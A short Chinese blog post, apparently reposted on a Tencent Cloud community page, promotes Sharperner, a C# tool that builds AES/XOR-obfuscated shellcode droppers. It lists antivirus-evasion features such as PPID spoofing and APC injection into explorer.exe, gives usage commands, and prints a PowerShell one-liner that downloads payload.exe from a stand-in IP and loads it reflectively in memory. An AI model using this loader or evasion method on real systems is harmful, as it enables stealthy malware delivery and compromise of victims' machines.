Sharperner - Shellcode生成器
Sharperner - Shellcode生成器
Khan安全团队
发布于 2021-07-30 15:26:02
发布于 2021-07-30 15:26:02
代码可运行
运行总次数:0
代码可运行
Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 shellcode 生成 .NET dropper生成的可执行文件可能可以绕过签名检查。
PE
- PPID欺骗
- 随机生成的 AES 密钥和 iv
- 最终的 Shellcode、Key 和 IV
.NET
- AES + XOR 加密的 shellcode
- APC 进程注入 (explorer.exe)
- 随机函数名
- 随机生成的 AES 密钥和 iv
- 最终的 Shellcode、Key 和 IV
使用方法
/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)
Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe生成的 .NET 可执行文件可以使用 powershell 反射加载
$data = ( New-Object System.Net.WebClient).DownloadData( ' http://10.10.10.10/payload.exe ' )
$assem = [ System.Reflection.Assembly ]::Load( $data )
[ TotallyNotMal.程序]::Main()项目地址
https://github.com/aniqfakhrul/Sharperner/releases/tag/0.1
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-08,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
